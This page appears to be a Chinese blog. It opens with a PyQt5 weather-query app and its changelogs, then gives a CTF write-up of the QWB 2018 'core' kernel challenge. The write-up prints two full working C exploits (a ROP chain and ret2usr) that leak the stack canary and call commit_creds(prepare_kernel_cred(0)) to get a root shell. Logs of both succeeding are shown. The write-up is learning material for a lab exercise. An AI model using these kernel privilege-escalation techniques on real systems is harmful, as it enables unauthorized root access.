self.weatherComboBox.addItem("")
self.weatherComboBox.addItem("")
self.resultText = QtWidgets.QTextEdit(self.groupBox)
self.resultText.setGeometry(QtCore.QRect(10,60,411,181))
self.resultText.setObjectName("resultText")
self.label = QtWidgets.QLabel(self.groupBox)
self.label.setGeometry(QtCore.QRect(20,20,72,21))
self.label.setObjectName("laber")
self.okButton = QtWidgets.QPushButton(Form)
self.okButton.setGeometry(QtCore.QRect(50,300,93,28))
self.okButton.setObjectName("okButton")
self.clearButton = QtWidgets.QPushButton(Form)
self.clearButton.setGeometry(QtCore.QRect(160,300,93,28))
self.clearButton.setObjectName("clearButton")
self.quitButton = QtWidgets.QPushButton(Form)
self.quitButton.setGeometry(QtCore.QRect(270,300,93,28))
self.quitButton.setObjectName("quitButton")

self.retranslateUI(Form)
self.okButton.clicked.connect(Form.queryWeather)
self.clearButton.clicked.connect(Form.clearResult)
self.quitButton.clicked.connect(Form.quitWindows)

#QtCore.QMetaObject.connectSlotsByName(Form)

def retranslateUI(self,Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form","天气预报"))

self.groupBox.setTitle(_translate("Form","查询城市天气"))
self.weatherComboBox.setItemText(0,_translate("Form","成都"))
self.weatherComboBox.setItemText(1,_translate("Form","南充"))
self.label.setText(_translate("Form","城市"))
self.okButton.setText(_translate("Form","查询"))
self.clearButton.setText(_translate("Form","清空"))
self.quitButton.setText(_translate("Form","退出"))

if __name__=='__main__':
app = QApplication(sys.argv)
win = Mainweather()
win.show()
sys.exit(app.exec_())

更新日志:

  • version:v1.0

  • date:2022.5.12

  • type:

    • Features:NULL
    • Changed:NULL
    • Removed:NULL
  • desc:

    • 第一代版本,后续考虑添加更换壁纸的功能

CallWeatherWin_V1.1

第二代版本主要是进行了美化操作,功能没有太大改变

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
import requests

class Mainweather(QWidget):
def __init__(self,parent=None):
super(Mainweather, self).__init__(parent)
self.setWindowFlags(Qt.SubWindow)
self.ui = UI_Form()
self.ui.setupUI(self)

def queryWeather(self):
print('* queryWeather ')
cityName = self.ui.weatherComboBox.currentText()
cityCode = self.transCityName(cityName)

rep = requests.get('http://www.weather.com.cn/data/sk/'+cityCode+'.html')
rep.encoding = 'utf-8'
print(rep.json())

msg1 = ('城市: %s' % rep.json()['weatherinfo']['city'])+'\n'
msg2 = ('风向: %s' % rep.json()['weatherinfo']['WD'])+'\n'
msg3 = ('温度: %s' % rep.json()['weatherinfo']['temp'] + " 度")+'\n'
msg4 = ('风力: %s' % rep.json()['weatherinfo']['WS'])+'\n'
msg5 = ('湿度: %s' % rep.json()['weatherinfo']['SD'])+'\n'

result = msg1+msg2+msg3+msg4+msg5
self.ui.resultText.setText(result)

def transCityName(self,cityName):
cityCode = ''
if cityName == '成都':
cityCode = '101270101'
elif cityName == '南充':
cityCode = '101270501'
return cityCode

def clearResult(self):
print('* clearResult ')
self.ui.resultText.clear()

def quitWindows(self):
print('* quitWindows ')
self.close()

class UI_Form(object):
def setupUI(self,Form):
Form.setObjectName("Form")
Form.resize(450,350)

self.groupBox = QtWidgets.QGroupBox(Form)
self.groupBox.setGeometry(QtCore.QRect(10,10,250,250))
self.groupBox.setObjectName("groupBox")
self.groupBox.setStyleSheet("color:white")
self.weatherComboBox = QtWidgets.QComboBox(self.groupBox)
self.weatherComboBox.setGeometry(QtCore.QRect(80,30,140,21))
self.weatherComboBox.addItem("")
self.weatherComboBox.addItem("")
self.weatherComboBox.setStyleSheet("color:black")
self.resultText = QtWidgets.QTextEdit(self.groupBox)
self.resultText.setGeometry(QtCore.QRect(10,60,220,181))
self.resultText.setObjectName("resultText")
self.resultText.setFont(QFont("微软雅黑",12,QFont.Bold))
self.resultText.setStyleSheet("color:black")
self.label = QtWidgets.QLabel(self.groupBox)
self.label.setGeometry(QtCore.QRect(20,20,72,21))
self.label.setObjectName("laber")
self.okButton = QtWidgets.QPushButton(Form)
self.okButton.setGeometry(QtCore.QRect(50,300,93,28))
self.okButton.setObjectName("okButton")
self.clearButton = QtWidgets.QPushButton(Form)
self.clearButton.setGeometry(QtCore.QRect(160,300,93,28))
self.clearButton.setObjectName("clearButton")
self.quitButton = QtWidgets.QPushButton(Form)
self.quitButton.setGeometry(QtCore.QRect(270,300,93,28))
self.quitButton.setObjectName("quitButton")

self.retranslateUI(Form)
self.okButton.clicked.connect(Form.queryWeather)
self.clearButton.clicked.connect(Form.clearResult)
self.quitButton.clicked.connect(Form.quitWindows)

QtCore.QMetaObject.connectSlotsByName(Form)

def retranslateUI(self,Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form","天气预报"))
self.groupBox.setTitle(_translate("Form","查询城市天气"))
self.weatherComboBox.setItemText(0,_translate("Form","成都"))
self.weatherComboBox.setItemText(1,_translate("Form","南充"))
self.label.setText(_translate("Form","城市"))
self.okButton.setText(_translate("Form","查询"))
self.clearButton.setText(_translate("Form","清空"))
self.quitButton.setText(_translate("Form","退出"))

if __name__=='__main__':
app = QApplication(sys.argv)
win = Mainweather()
palette = QPalette()
palette.setBrush(QPalette.Background, QBrush(QPixmap("D:\PythonProject\images\YHellow.png")))
win.setPalette(palette)
win.show()

sys.exit(app.exec_())

更新日志:

  • version:v1.1

  • date:2022.5.13

  • type:

    • Features:
      • 导入了图片背景
      • 修改了字体和颜色
    • Changed:
      • 对部分代码进行了调整,使其更易读
    • Removed:NULL
  • desc:

    • 目前该项目以完善,在很长一段时间里可能都不会再碰该项目

core 复现

文件如下:

  • bzImage:压缩的内核映像
  • core.cpio:文件系统映像
  • start.sh:用于启动 kernel 的 shell 的脚本
  • vmlinux:静态链接的可执行文件格式的 Linux 内核

如果没有 vmlinux,就需要使用 extract-vmlinux 进行提取,不过我更喜欢用 vmlinux-to-elf:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/* vmlinux-to-elf [core.cpio] [vmlinux] */
➜ give_to_player vmlinux-to-elf core.cpio vmlinux
[+] Kernel successfully decompressed in-memory (the offsets that follow will be given relative to the decompressed binary)
[+] Version string: Linux version 4.15.8 (simple@vps-simple) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-16) (GCC)) #20 SMP Fri Mar 23 21:12:32 CST 2018
[+] Guessed architecture: x86_64 successfully in 4.66 seconds
[+] Found kallsyms_token_table at file offset 0x016b5320
[+] Found kallsyms_token_index at file offset 0x016b5660
[+] Found kallsyms_markers at file offset 0x016b4de0
[+] Found kallsyms_names at file offset 0x01635568
[+] Found kallsyms_num_syms at file offset 0x01635560
[i] Negative offsets overall: 99.9953 %
[i] Null addresses overall: 0.0046729 %
[+] Found kallsyms_offsets at file offset 0x0160b898
[+] Successfully wrote the new ELF kernel to vmlinux
  • 提取出来的 vmlinux 文件没有原版的好用
  • 但是在搜索 gadget 时,尽量使用提取出来的 vmlinux,防止两个 vmlinux 不一样

然后使用 Ropper 来寻找 gadget:

1
2
3
4
5
➜  give_to_player time ropper --file ./vmlinux --nocolor > g1
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
ropper --file ./vmlinux --nocolor > g1 77.22s user 27.66s system 118% cpu 1:28.72 total

看一下启动脚本 start.sh:

1
2
3
4
5
6
7
8
9
➜  give_to_player cat start.sh         
qemu-system-x86_64 \
-m 64M \
-kernel ./bzImage \
-initrd ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \
  • 内核开启了 kaslr 保护

尝试启动时我遇见了问题:

  • 按照 wiki 上的提示,把 start.sh 中的 64M 改为 128M,但是还是无效
  • 于是我改为 256M,成功了
1
2
3
4
5
6
7
8
[    0.023472] Spectre V2 : Spectre mitigation: LFENCE not serializing, switchie
udhcpc: started, v1.26.2
udhcpc: sending discover
udhcpc: sending discover
udhcpc: sending select for 10.0.2.15
udhcpc: lease of 10.0.2.15 obtained, lease time 86400
/ $ ls
bin etc lib proc sys vmlinux

解压 core.cpio:

1
2
3
4
5
➜  core gunzip ./core.cpio.gz 
➜ core cpio -idm < ./core.cpio
➜ core ls
bin etc init lib64 proc sbin tmp vmlinux
core.ko gen_cpio.sh lib linuxrc root sys usr
  • 发现除了常规的文件目录外,还有个 gen_cpio.sh
1
2
3
4
➜  core cat gen_cpio.sh 
find . -print0 \
| cpio --null -ov --format=newc \
| gzip -9 > $1
  • 这是一个打包的脚本(shell脚本有点看不懂,还要多多学习)

看一下 core.cpio->init:(获取重要信息)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
➜  core cat init               
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms // 把kallsyms的内容保存到了/tmp/kallsyms中,那么我们就能从/tmp/kallsyms中读取commit_creds,prepare_kernel_cred的函数的地址了
echo 1 > /proc/sys/kernel/kptr_restrict // 把kptr_restrict设为'1',这样就不能通过/proc/kallsyms查看函数地址了(但上一行已经把其中的信息保存到了一个可读的文件中,这句就无关紧要了)
echo 1 > /proc/sys/kernel/dmesg_restrict // 把dmesg_restrict设为'1',这样就不能通过dmesg查看kernel的信息了
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2
insmod /core.ko

poweroff -d 120 -f & // 设置定时关机,为了避免做题时产生干扰,直接把这句删掉然后重新打包
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys

poweroff -d 0 -f
  • /proc/kallsyms 其实是内核符号表,拥有内核符号的地址

重新打包后,我们着重分析一下 core.ko 驱动文件:

1
2
3
4
5
6
➜  core checksec core.ko 
Arch: amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x0)

64位,dynamically,开了carnay,开了NX

这些函数就是驱动函数,也被称为 ioctl 函数:

  • ioctl 是设备驱动程序中对设备的 I/O 通道进行管理的函数
  • ioctl 函数是文件结构中的一个属性分量,就是说如果你的驱动程序提供了对 ioctl 的支持,用户就可以在用户程序中使用 ioctl 函数控制设备的 I/O 通道
  • 在驱动程序中实现的 ioctl 函数体内,实际上是有一个 switch{case} 结构,每一个 case 对应一个命令码,做出一些相应的操作,怎么实现这些操作,这是由每一个程序员自己控制的,因为设备都是特定的

驱动函数是 kernel 中容易出问题的点,接下来就看看这些函数:

  • init_module:注册了 /proc/core
1
2
3
4
5
void __fastcall init_module()
{
core_proc = proc_create("core", 438LL, 0LL, &core_fops);
printk("16core: created /proc/core entry\n");
}
  • exit_core:删除 /proc/core
1
2
3
4
5
void __fastcall exit_core()
{
if ( core_proc )
remove_proc_entry("core");
}
  • core_ioctl:定义了三条命令,分别调用 core_read(),core_copy_func() 和设置全局变量 off
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
void __fastcall core_ioctl(__int64 a1, int choice, __int64 a3)
{
switch ( choice )
{
case 1719109787: // 0x6677889B
core_read((char *)a3);
break;
case 1719109788: // 0x6677889C
printk("16core: %d\n", a3);
off = a3;
break;
case 1719109786: // 0x6677889A
printk("16core: called core_copy\n");
core_copy_func(a3);
break;
}
}
  • core_read:从内核空间 from[off] 拷贝 64 字节到用户空间
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
void __fastcall core_read(char *a1)
{
_DWORD *p; // rdi
__int64 i; // rcx
char from[64]; // [rsp+0h] [rbp-50h] BYREF
unsigned __int64 canary; // [rsp+40h] [rbp-10h]

canary = __readgsqword(0x28u);
printk("16core: called core_read\n");
printk("16%d %p\n", off, a1);
p = from;
for ( i = 16LL; i; --i ) // 置空64(16*4)位
*p++ = 0;
strcpy(from, "Welcome to the QWB CTF challenge.\n");
if ( copy_to_user(a1, &from[off], 64LL) )
__asm { swapgs } // 调用swapgs命令,在gs寄存器的内核与用户态值之间切换,为离开内核做准备
}
  • core_write:向全局变量 name 上写
1
2
3
4
5
6
void __fastcall core_write(__int64 a1, __int64 from, unsigned __int64 len)
{
printk(&str1);
if ( len > 0x800 || copy_from_user(&name, from, len) )
printk(&str2);
}
  • core_copy_func:从全局变量 name 中拷贝数据到局部变量中
1
2
3
4
5
6
7
8
9
10
11
void __fastcall core_copy_func(__int64 a1)
{
char v1[80]; // [rsp+0h] [rbp-50h] BYREF

*(_QWORD *)&v1[64] = __readgsqword(0x28u);
printk("16core: called core_writen");
if ( a1 > 63 )
printk("16Detect Overflow");
else
qmemcpy(v1, &name, (unsigned __int16)a1); // 漏洞点:因数组溢出导致的栈溢出
}

这是我的第一个内核题,我全程都是按照 wiki 上的提示做的,所以我会尽可能的复述解题的过程和思路,有些必要的知识也会进行补充

当我们打开这个 kernel 时:

1
2
/ $ whoami
chal

我们是普通用户权限,需要提权拿“flag”,这里先介绍一下权限和提权:

  • 内核会通过进程的 task_struct 结构体中的 cred 指针来索引 cred 结构体,然后根据 cred 的内容来判断一个进程拥有的权限,如果 cred 结构体成员中的 uid-fsgid 都为 0,那一般就会认为进程具有 root 权限
  • 内核提权指的是普通用户可以获取到 root 用户的权限,访问原先受限的资源,这里从两种角度来考虑如何提权
    • 改变自身(Change Self):通过改变自身进程的权限,使其具有 root 权限
      • 直接修改 cred 结构体的内容(需要先定位 cred,然后将其修改)
      • 修改 task_struct 结构体中的 cred 指针指向一个满足要求的 cred
    • 改变别人(Change Others):通过影响高权限进程的执行,使其完成我们想要的功能
      • 改数据
      • 改代码

具体的过程就不展开了

  • 在本题目的环境中,因为程序有栈溢出漏洞可以控制程序执行流,所以可以通过 ROP 来调用 commit_creds(prepare_kernel_cred(0)) 进行提取
  • 该方式会自动生成一个合法的 cred,并定位当前线程的 task_struct 的位置,然后修改它的 cred 为新的 cred
  • 另外,该方式属于“改变自身”中的“修改 task_struct 结构体”

为了调用 prepare_kernel_cred 首先需要实现 ROP:

  • 通过 ioctl 设置 off,然后通过 core_read() leak 出 canary
  • 通过 core_write() 向 name 写,构造 ropchain
  • 通过 core_copy_func() 从 name 向局部变量上写,通过设置合理的长度和 canary 进行 rop
  • 通过 rop 执行 commit_creds(prepare_kernel_cred(0))
  • 返回用户态,通过 system(“/bin/sh”) 等起 shell

这又有一个问题,如何在 shell 中使用这些驱动函数呢?在C语言中有专门的接口:

1
ioctl(fd, function_num, var);

使用这个函数的前提是知道 function_num(可以直接在 core_ioctl 的 Switch-Case 中找到它)

接下来介绍利用GDB调试的方法:

  • 使用 gdb ./vmlinux 可以进行调试
  • 虽然加载了 kernel 的符号表,但没有加载驱动 core.ko 的符号表,可以通过 add-symbol-file core.ko textaddr 加载
  • .text 段的地址可以通过 /sys/modules/core/section/.text 来查看,查看需要 root 权限,因此为了方便调试,我们再改一下 init
1
2
# setsid /bin/cttyhack setuidgid 1000 /bin/sh
setsid /bin/cttyhack setuidgid 0 /bin/sh
1
2
3
4
5
0xffffffffc0257000
/ # whoami
root
/ # cat /sys/module/core/sections/.text
0xffffffffc0257000

接下来进行调试:

  • 先使用 start.sh 打开 kernel
  • 然后打开 GDB
1
2
3
4
5
➜  core gdb ./vmlinux   
pwndbg: loaded 198 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./vmlinux...
(No debugging symbols found in ./vmlinux)
  • 使用 add-symbol-file 加载符号,然后就可以利用符号进行断点了
1
2
3
4
5
6
7
pwndbg> add-symbol-file core.ko 0xffffffffc0257000
add symbol table from file "core.ko" at
.text_addr = 0xffffffffc0257000
Reading symbols from core.ko...
(No debugging symbols found in core.ko)
pwndbg> b core_read
Breakpoint 1 at 0xffffffffc0257063
  • 尝试用 GDB 连接 kernel
1
2
3
pwndbg> target remote localhost:1234
Remote debugging using localhost:1234
0xffffffff9586e7d2 in ?? ()

最后就来学习学习官方的exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
/* <-- 直接ROP --> */
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>

void spawn_shell() /* 后门函数 */
{
if(!getuid())
{
system("/bin/sh");
}
else
{
puts("[*]spawn shell error!");
}
exit(0);
}

size_t commit_creds = 0, prepare_kernel_cred = 0;
size_t raw_vmlinux_base = 0xffffffff81000000; /* 后续说明基地址的计算 */
size_t vmlinux_base = 0;
size_t find_symbols() /* 收集必要信息 */
{
FILE* kallsyms_fd = fopen("/tmp/kallsyms", "r");
/* 根据前面的分析,这里读取/tmp/kallsyms相当于读取/proc/kallsyms(内核符号表) */

if(kallsyms_fd < 0)
{
puts("[*]open kallsyms error!");
exit(0);
}

char buf[0x30] = {0};
while(fgets(buf, 0x30, kallsyms_fd))
{
if(commit_creds & prepare_kernel_cred) /* 如果都已经读入过了,直接返回 */
return 0;

if(strstr(buf, "commit_creds") && !commit_creds)
{
/* 读取commit_creds的地址(更新当前进程的cred),计算vmlinux_base */
char hex[20] = {0};
strncpy(hex, buf, 16);
sscanf(hex, "%llx", &commit_creds);
printf("commit_creds addr: %p\n", commit_creds);
vmlinux_base = commit_creds - 0x9c8e0; /* 后续说明该偏移的计算 */
printf("vmlinux_base addr: %p\n", vmlinux_base);
}

if(strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
{
/* 读取prepare_kernel_cred的地址(构造一个新的cred),计算vmlinux_base */
char hex[20] = {0};
strncpy(hex, buf, 16);
sscanf(hex, "%llx", &prepare_kernel_cred);
printf("prepare_kernel_cred addr: %p\n", prepare_kernel_cred);
vmlinux_base = prepare_kernel_cred - 0x9cce0; /* 后续说明该偏移的计算 */
}
}

if(!(prepare_kernel_cred & commit_creds))
{
puts("[*]Error!");
exit(0);
}

}

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status() /* 保存当前寄存器的状态 */
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[*]status has been saved.");
}

void set_off(int fd, long long idx) /* 设置off */
{
printf("[*]set off to %ld\n", idx);
ioctl(fd, 0x6677889C, idx);
}

void core_read(int fd, char *buf) /* core_read的外包装 */
{
puts("[*]read to buf.");
ioctl(fd, 0x6677889B, buf);

}

void core_copy_func(int fd, long long size) /* core_copy_func的外包装 */
{
printf("[*]copy from user with size: %ld\n", size);
ioctl(fd, 0x6677889A, size);
}

int main()
{
save_status();
int fd = open("/proc/core", 2);
if(fd < 0)
{
puts("[*]open /proc/core error!");
exit(0);
}

find_symbols(); /* 获取相关信息 */
ssize_t offset = vmlinux_base - raw_vmlinux_base;

set_off(fd, 0x40); /* 设置全局变量off为'0x40'(为了泄露carnay) */

char buf[0x40] = {0};
core_read(fd, buf); /* 从from[off](内核空间)拷贝64个字节到buf(用户空间) */
size_t canary = ((size_t *)buf)[0]; /* 因为偏移off是0x40,所以直接泄露了canary */
printf("[+]canary: %p\n", canary);

size_t rop[0x1000] = {0}; /* 初始化ROP链 */

int i;
/* 构造ROP链 */
for(i = 0; i < 10; i++)
{
rop[i] = canary;
// rop[0-7]:共64字节(8*8),用于填充内核局部变量
// rop[8]:canary应该在的位置
// rop[9]:rbp的位置
}
rop[i++] = 0xffffffff81000b2f + offset; // pop rdi; ret
rop[i++] = 0;
rop[i++] = prepare_kernel_cred; // prepare_kernel_cred(0)

rop[i++] = 0xffffffff810a0f49 + offset; // pop rdx; ret
rop[i++] = 0xffffffff81021e53 + offset; // pop rcx; ret
rop[i++] = 0xffffffff8101aa6a + offset; // mov rdi, rax; call rdx;
rop[i++] = commit_creds;

rop[i++] = 0xffffffff81a012da + offset; // swapgs; popfq; ret
/* swapgs:交换GS基址寄存器(准备回到用户态) */
/* popfq:弹出堆栈到EFLAGS寄存器 */
rop[i++] = 0;

rop[i++] = 0xffffffff81050ac2 + offset; // iretq; ret;
/* iretq:返回到用户空间(在执行iretq之前,先执行swapgs指令) */

rop[i++] = (size_t)spawn_shell; // rip(后门函数)

rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x800); /* 最后还是会调用core_write(可能要看源码) */
core_copy_func(fd, 0xffffffffffff0000 | (0x100)); /* 全局变量name中拷贝数据到内核局部变量中 */

return 0;
}

先介绍几个概念:

  • raw_vmlinux_base:kaslr 加工前的内核加载基址
  • vmlinux_base:kaslr 加工后的内核加载基址

kaslr,类似ASLR,内核基址地址加载随机化

  • 通过泄露内核地址,通过偏移计算出内核基址(如果没有开PIE,就可以直接获取 raw_vmlinux_base)
  • 再计算 kaslr 对内核基址的偏移(offset = vmlinux_base - raw_vmlinux_base)
  • 用 offset 修正其他函数的地址

官方exp选择从“内核符号表”泄露以下两个函数:

  • prepare_kernel_cred:构造一个新的 cred
  • commit_creds:更新当前进程的 cred
  • commit_creds(prepare_kernel_cred(0)):构造一个 cred(0),并把它更新为当前进程的 cred

在主函数中,程序打开了 proc 目录中的某个文件(这个 proc 和 PROC 虚拟文件系统有关),然后调用 ioctl 来执行驱动函数,利用其本身的漏洞泄露 canary,触发 ROP链(就是想方设法构造出“commit_creds(prepare_kernel_cred(0))”,并返回用户空间)

最后看看这几个偏移是怎么计算出来的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
>>> from pwn import *
>>> vmlinux = ELF("./vmlinux")
[*] '/home/yhellow/\xe6\xa1\x8c\xe9\x9d\xa2/\xe5\xbc\xba\xe7\xbd\x91\xe6\x9d\xaf2018/give_to_player/vmlinux'
Arch: amd64-64-little
Version: 4.15.8
RELRO: No RELRO
Stack: Canary found
NX: NX disabled
PIE: No PIE (0xffffffff81000000)
RWX: Has RWX segments
>>> hex(vmlinux.sym['commit_creds'] - 0xffffffff81000000)
'0x9c8e0'
>>> hex(vmlinux.sym['prepare_kernel_cred'] - 0xffffffff81000000)
'0x9cce0'

结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[    0.022212] Spectre V2 : Spectre mitigation: LFENCE not serializing, switchie
udhcpc: started, v1.26.2
udhcpc: sending discover
udhcpc: sending discover
udhcpc: sending select for 10.0.2.15
udhcpc: lease of 10.0.2.15 obtained, lease time 86400
/ $ whoami
chal
/ $ /tmp/exp
[*]status has been saved.
commit_creds addr: 0xffffffff8b09c8e0
vmlinux_base addr: 0xffffffff8b000000
prepare_kernel_cred addr: 0xffffffff8b09cce0
[*]set off to 64
[*]read to buf.
[+]canary: 0x12ce77bc03269b00
[*]copy from user with size: -65280
/ # whoami
root

除了 prepare_kernel_cred,还有其他方式来提权,这里介绍一下 ret2usr:

  • ret2usr 攻击利用了用户空间的进程不能访问内核空间,但内核空间能访问用户空间这个特性来定向内核代码或数据流指向用户控件,以 ring 0 特权执行用户空间代码完成提权等操作

以本题为例,exp 分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
/* <-- ret2usr --> */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[*]status has been saved.");
}

void get_shell(void){
system("/bin/sh");
}

size_t commit_creds = 0, prepare_kernel_cred = 0;
size_t raw_vmlinux_base = 0xffffffff81000000;
size_t vmlinux_base = 0;
size_t find_symbols()
{
FILE* kallsyms_fd = fopen("/tmp/kallsyms", "r");

if(kallsyms_fd < 0)
{
puts("[*]open kallsyms error!");
exit(0);
}

char buf[0x30] = {0};
while(fgets(buf, 0x30, kallsyms_fd))
{
if(commit_creds & prepare_kernel_cred)
return 0;

if(strstr(buf, "commit_creds") && !commit_creds)
{
char hex[20] = {0};
strncpy(hex, buf, 16);
sscanf(hex, "%llx", &commit_creds);
printf("commit_creds addr: %p\n", commit_creds);
vmlinux_base = commit_creds - 0x9c8e0;
printf("vmlinux_base addr: %p\n", vmlinux_base);
}

if(strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
{
char hex[20] = {0};
strncpy(hex, buf, 16);
sscanf(hex, "%llx", &prepare_kernel_cred);
printf("prepare_kernel_cred addr: %p\n", prepare_kernel_cred);
vmlinux_base = prepare_kernel_cred - 0x9cce0;
}
}

if(!(prepare_kernel_cred & commit_creds))
{
puts("[*]Error!");
exit(0);
}
}

void get_root()
{
/* 注意:"prepare_kernel_cred"和"commit_creds"都是地址,需要用函数指针执行 */
char* (*pkc)(int) = prepare_kernel_cred;
void (*cc)(char*) = commit_creds;
(*cc)((*pkc)(0));
/* 相当于执行"commit_creds(prepare_kernel_cred(0));" */
}

void set_off(int fd, long long idx)
{
printf("[*]set off to %ld\n", idx);
ioctl(fd, 0x6677889C, idx);
}

void core_read(int fd, char *buf)
{
puts("[*]read to buf.");
ioctl(fd, 0x6677889B, buf);

}

void core_copy_func(int fd, long long size)
{
printf("[*]copy from user with size: %ld\n", size);
ioctl(fd, 0x6677889A, size);
}

int main(void)
{
find_symbols();
size_t offset = vmlinux_base - raw_vmlinux_base;
save_status();

int fd = open("/proc/core",O_RDWR);
set_off(fd, 0x40);
size_t buf[0x40/8];
core_read(fd, buf);
size_t canary = buf[0];
printf("[*]canary : %p\n", canary);

size_t rop[0x30] = {0};
rop[8] = canary ;
rop[9] = 0;
rop[10] = (size_t)get_root;
rop[11] = 0xffffffff81a012da + offset; // swapgs; popfq; ret
rop[12] = 0;
rop[13] = 0xffffffff81050ac2 + offset; // iretq; ret;
rop[14] = (size_t)get_shell;
rop[15] = user_cs;
rop[16] = user_rflags;
rop[17] = user_sp;
rop[18] = user_ss;

puts("[*] DEBUG: ");
getchar();
write(fd, rop, 0x30 * 8);
core_copy_func(fd, 0xffffffffffff0000 | (0x100));
}

前面的过程都相同,但 ROP 链的构造有所不同

  • 直接ROP:
    • 把 prepare_kernel_cred 和 commit_creds 拆散,放到 ROP 链中执行
  • ret2usr:
    • 直接返回到用户空间构造的 commit_creds(prepare_kernel_cred(0))(通过函数指针实现)来提权
    • 虽然这两个函数位于内核空间,但此时我们是 ring 0 特权,因此可以正常运行
    • 之后也是通过 swapgs; iretq 返回到用户态来执行用户空间的 system("/bin/sh")

结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[    0.021763] Spectre V2 : Spectre mitigation: LFENCE not serializing, switchie
udhcpc: started, v1.26.2
udhcpc: sending discover
udhcpc: sending discover
udhcpc: sending select for 10.0.2.15
udhcpc: lease of 10.0.2.15 obtained, lease time 86400
/ $ whoami
chal
/ $ /tmp/exp2
commit_creds addr: 0xffffffffaea9c8e0
vmlinux_base addr: 0xffffffffaea00000
prepare_kernel_cred addr: 0xffffffffaea9cce0
[*]status has been saved.
[*]set off to 64
[*]read to buf.
[*]canary : 0xedec5afb6b0a1800
[*] DEBUG:

[*]copy from user with size: -65280
/ # whoami
root

小结:

这是我的第一个 kernel pwn,刚刚进入 kernel 感觉有点迷茫,不知道该获取什么信息,修改什么数据,完成此题后我的思路清晰了一点:

  • 驱动函数是 kernel 中容易出问题的点,可以用C语言中的 ioctl 来执行驱动函数
  • /proc/kallsyms 是内核符号表,拥有内核符号的地址,需要收集此信息
  • kaslr,类似ASLR,内核基址地址加载随机化
  • 使用 commit_creds(prepare_kernel_cred(0)) 进行提权(可以放入ROP链中,也可以通过函数指针执行这个整体)

踩到的坑:

  • start.sh 中给的内存太小,导致 kernel 跑不起来
  • 题目自带的 vmlinux 和 core.cpio 中的 vmlinux 不一样,导致 gadget 出问题